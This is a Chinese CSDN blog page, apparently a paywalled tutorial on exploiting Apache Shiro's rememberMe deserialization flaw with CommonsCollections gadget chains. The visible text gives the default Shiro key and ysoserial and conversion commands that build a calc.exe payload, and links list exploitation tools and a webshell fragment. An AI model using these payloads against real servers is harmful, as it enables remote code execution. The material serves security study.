Java反序列化(十一)CommonCollectionsK1分析及在Shiro中的利用

最新推荐文章于 2023-03-06 14:37:23 发布
最新推荐文章于 2023-03-06 14:37:23 发布
阅读量945 收藏
点赞数
分类专栏: Java 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41918771/article/details/120933456
版权

前言

在Shiro中的利用可真是复杂

利用CC6攻击Shiro

使用CC6链生成payload,进行利用。shiro 1.2.4以下默认使用密钥为kPH+bIxk5D2deZiIxcaaaA==

通过yso获取序列化对象。

java -jar ysoserial.jar CommonsCollections6 "calc.exe" > result.ser

然后通过Serfile_to_rememberme.py生成payload。

python3 Serfile_to_rememberme.py kPH+bIxk5D2deZiIxcaaaA== result.ser > 1.txt

工具地址:https://github.com/Vicl1fe/Tools/blob/main/%E5%B0%8F%E5%B7%A5%E5%85%B7/Shiro%E5%BA%8F%E5%88%97%E5%8C%96%E6%96%87%E4%BB%B6%E8%BD%ACrememberMe/Serfile_to_rememberme.py
在这里插入图片描述
发送payload,没有利用成功,tomcat报错如下。

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Vicl1fe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Java反序列化(十二)CommonCollectionsK2分析
Vicl1fe的博客
10-25 362
CommonCollectionsK2 在 Shiro_k1文章讲解了CommonCollectionsK1利用代码。需要CC版本小于3.2.1。 而CommonCollectionsK2就是在CC4.0利用。其实利用代码和K1的是一样的。只是有一个地方不一样。 在K1,LazyMap是这样获取的 Map lazyMap = LazyMap.decorate(outmap,faketransformer); 而在CC4,没有了decorate方法。用lazyMap方法代替即可 所以K2这样
shiro反序列化k1/2利用
weixin_45682070的博客
03-03 1906
前言 shirok1/k2链条其实之前我已经分析过了,但是呢,没以文章的形式发出来。可能有点懒惰了。上篇文章我们一起看了t3协议,t3反序列化的修复手段是在resolveClass方法添加检查,增加黑名单的形式。而shiro是重写了resolveClass方法导致很多利用链无法使用,但是shiro在编写的时候,并不是为了防御反序列化漏洞才去重写的resolveClass,但是就是这么一个无意间的举动,导致了防御住了大部分攻击。下面我们分析。 直接使用cc6 cc6的利用链我们前面有,拿来直接用,默认key
Shiro_Xray:CommonsBeanutils1,CommonsCollectionsK1
04-14
Shiro_Xray 小工具 CommonsBeanutils1 CommonsCollectionsK1 CommonsCollectionsK2 Getshell冰蝎 import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import java.io.PrintWriter; import java.net.URLDecoder; import sun.misc.BASE64Decoder; public class 10837093162496 extends AbstractTranslet { static { Object var1 = null; String var2 = Thread.currentThread().getContextClassLoa
python3报错:ModuleNotFoundError: No module named ‘Crypto‘
热门推荐
猎人在吃肉
11-12 3万+
1、问题 win10 上 执行 python 脚本,然后报错了,提示 No module named 'Crypto' C:\Users\admin >python shiro_rce.py -u http://127.0.0.1:8080/ -m whoami -k kPH+bIxk5D2deZiIxcaaaA== -g CommonsCollectionsK1 Traceback (most recent call last): File "shiro_rce.py", line 5, in
Shiro反序列化漏洞综合
FODKING的博客
09-07 843
Apache Shiro框架提供了记住我的功能(RememberMe),在服务器上存在反序列化漏洞。
使用 Fuzztag 一键爆破反序列化
阿道夫的博客
03-06 259
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Javaweb安全——反序列化漏洞-CC&CB链思路整理
weixin_43610673的博客
10-28 2260
如上图所示基本上起点终点就是那几个点然后相互拼接:《Shiro RememberMe 漏洞检测的探索之路》Koalr师傅已经对CommonsCollections 系列 gadget进行了提纯变成以下四条对命令执行部分的调用分别为InvokerTransformer调用TemplatesImpl对 commons-Collections4 的适配则直接用替换。
[Java反序列化]CommonsCollections1利用链学习(下)
feng的博客
08-14 416
前言 白天学习了CommonsCollections1的TransformedMap链,感觉打开了新世界的大门,所以晚上学习了LazyMap链,感觉也没那么难理解,可能是因为我在看CC链之前已经把基础知识都给过了一遍叭,所以才没那么困难。 环境 <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>com
Java代码审计:反序列化CommonsCollections1详解
god_Zeo的安全博客
08-27 1410
0x01 漏洞介绍 Apache Commons Collections是一个第三方的基础类库,提供了很多强有力的数据结构类型并且实现了各种集合工具类,可以说是apache开源项目的重要组件。 CommonsCollection在java反序列化的源流已经存在5年 今天介绍的CommonsCollections1,反序列化的第一种RCE序列化链 CommonsCollections1反序列化漏洞点仍然是commons-collections-3.1版本 0x02 实验环境 maven的pom导入依赖
Java反序列化漏洞:Commons Collections 1 学习笔记
niu_niu_的博客
11-29 590
Java反序列化漏洞,cc1
Commons BeanUtils包说明
03-16
NULL 博文链接:https://sosuny.iteye.com/blog/447564
commons-collections所有版本(1.0-3.2.1).zip
10-14
commons-collections所有版本(1.0-3.2.1).zip
shiro反序列化脚本.zip
07-28
需要用到的俩个文件 ysoserial-master.jar 和 poc.py
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
shiro反序列化工具,加强版
12-27
shiro反序列化工具,加强版
反序列化利用工具ShiroExploit.V2.51.7z
08-31
反序列化利用工具
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
apache-common-collections
Rebirth 重生
06-19 633
新的集合 Bag Bag定义了一种集合:收集一个对象出现的次数。 例如Bag:{a,a,b,c} 调用bag.getCount(a)返回2,意味着里面有2个a。 调用bag.uniqueSet()则返回一个set,值为{a,b,c}。 这个集合可以用来计数,而如果用set则无法实现,用map可以把count作为value来勉强实现,但显然在add操作的时候并不优雅,需要: map.put...
Java反序列化漏洞——CommonsCollections1链分析
Thunderclap的博客
02-17 1162
我们知道,如果一个类的方法被重写,那么在调用这个函数时,会优先调用经过修改的方法。因此,如果某个可序列化的类重写了readObject()方法,并且在readObject()对Map类型的变量进行了键值修改操作,且这个Map变量是可控的,我么就可以实现攻击目标。LazyMap的漏洞触发点和TransformedMap唯一的差别是,TransformedMap是在写入元素的时候执行transform,而LazyMap是在其get方法执行的factory.transform。
shiro反序列化利用工具
最新发布
07-27
由于Shiro在处理用户会话序列化时存在一些安全漏洞,攻击者可以利用这些漏洞进行反序列化攻击。 反序列化攻击是一种利用Java对象序列化机制的攻击方法。攻击者可以通过构造恶意的序列化数据,将其传递给目标应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vicl1fe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值